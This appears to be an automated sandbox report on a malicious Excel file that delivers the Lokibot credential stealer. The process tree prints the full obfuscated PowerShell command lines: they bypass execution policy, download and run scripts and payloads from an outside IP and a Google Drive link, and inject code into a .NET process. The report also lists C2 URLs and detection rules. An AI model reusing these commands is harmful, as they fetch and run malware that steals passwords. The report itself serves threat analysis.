Edit tour

Windows Analysis Report
SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Overview

General Information

Sample name:	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
Analysis ID:	1541460
MD5:	ad791e87a785989bf5dc066db100e652
SHA1:	dabe7215a329944fd262906aae16b9c9ec689c0e
SHA256:	26daad7f2b88dfa67240b07b416d9261909f0398e17e8a62e29a8e324d49d94d
Tags:	xlsx
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for sample

Microsoft Office drops suspicious files

Obfuscated command line found

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected aPLib compressed binary

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Compiles C# or VB.Net code

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Searches the installation path of Mozilla Firefox

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3596 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

mshta.exe (PID: 3868 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 4008 cmdline: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 3116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3328 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 3352 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 3028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 3036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 1224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

AddInProcess32.exe (PID: 1488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cd\u00cd\u00cf\u00d0\u008c\u0096\u0092\u008f\u0093\u009a\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000010.00000002.621074045.0000000000900000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: powershell.exe PID: 3036	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xf6576:$b2: ::FromBase64String( 0xf6f5b:$b2: ::FromBase64String( 0xf80b4:$b2: ::FromBase64String( 0xf8755:$b2: ::FromBase64String( 0xf8f45:$b2: ::FromBase64String( 0xf959f:$b2: ::FromBase64String( 0xa43:$b3: ::UTF8.GetString( 0x13b4:$b3: ::UTF8.GetString( 0x1c81:$b3: ::UTF8.GetString( 0x44ca:$b3: ::UTF8.GetString( 0xf6ad:$b3: ::UTF8.GetString( 0xffec:$b3: ::UTF8.GetString( 0x108b9:$b3: ::UTF8.GetString( 0x63388:$b3: ::UTF8.GetString( 0x656b8:$b3: ::UTF8.GetString( 0x65765:$b3: ::UTF8.GetString( 0x66001:$b3: ::UTF8.GetString( 0x69b46:$b3: ::UTF8.GetString( 0x6a413:$b3: ::UTF8.GetString( 0x6b270:$b3: ::UTF8.GetString( 0x6bce4:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 1224	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1224	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x9f89:$b2: ::FromBase64String( 0xa5a6:$b2: ::FromBase64String( 0x2393b:$b2: ::FromBase64String( 0x3059c:$b2: ::FromBase64String( 0x30bec:$b2: ::FromBase64String( 0x31e8b:$b2: ::FromBase64String( 0x4f6bc:$b2: ::FromBase64String( 0x588ff:$b2: ::FromBase64String( 0x5b455:$b2: ::FromBase64String( 0x5bbbe:$b2: ::FromBase64String( 0x6ff44:$b2: ::FromBase64String( 0x70593:$b2: ::FromBase64String( 0x8ad98:$b2: ::FromBase64String( 0x8bc59:$b2: ::FromBase64String( 0x8d561:$b2: ::FromBase64String( 0x9d31:$b3: ::UTF8.GetString( 0xa34e:$b3: ::UTF8.GetString( 0x236e3:$b3: ::UTF8.GetString( 0x30344:$b3: ::UTF8.GetString( 0x30994:$b3: ::UTF8.GetString( 0x31c33:$b3: ::UTF8.GetString(
Process Memory Space: AddInProcess32.exe PID: 1488	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: AddInProcess32.exe PID: 1488	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: AddInProcess32.exe PID: 1488	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: AddInProcess32.exe PID: 1488	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x74ca:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
16.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
16.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.AddInProcess32.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
16.2.AddInProcess32.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
16.2.AddInProcess32.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
16.2.AddInProcess32.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
16.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
16.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
16.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
16.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.AddInProcess32.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
16.2.AddInProcess32.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
16.2.AddInProcess32.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
16.2.AddInProcess32.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
16.2.AddInProcess32.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

